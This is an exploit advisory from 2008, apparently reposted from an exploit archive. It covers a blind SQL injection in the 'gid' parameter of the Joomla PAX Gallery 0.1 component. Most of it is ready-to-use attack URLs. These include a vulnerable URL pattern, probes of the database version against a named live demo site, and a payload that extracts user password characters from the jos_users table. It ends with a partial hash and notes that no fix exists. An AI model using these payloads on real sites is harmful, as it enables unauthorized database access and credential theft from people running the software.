Joomla Component PAX Gallery 0.1 Blind SQL Injection Vulnerability

2008-12-28 01:12:04

[■] Joomla Component PAX Gallery v 0.1 (gid) <= Blind SQL Injection Vulnerability

>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> Note: safe mode = ON
> Autor script: Tobias Floery
>---------------------------------------<


[■] ExPL0iT:


|: http://www.example.com/path/com_paxgallery&task=table&gid=[$qL]


[■] D£M0:

>Version:

|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5 [Ye$]

|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=4 [Noo]


|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20ascii(substring((select%20password%20from%20jos_users%20limit%201,1),1,1))%3E100

d8e423..ecc... ;-)

[■] Th4nKs::

\> Str0ke </ \> Securitycode Team </ \> StaKer </

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.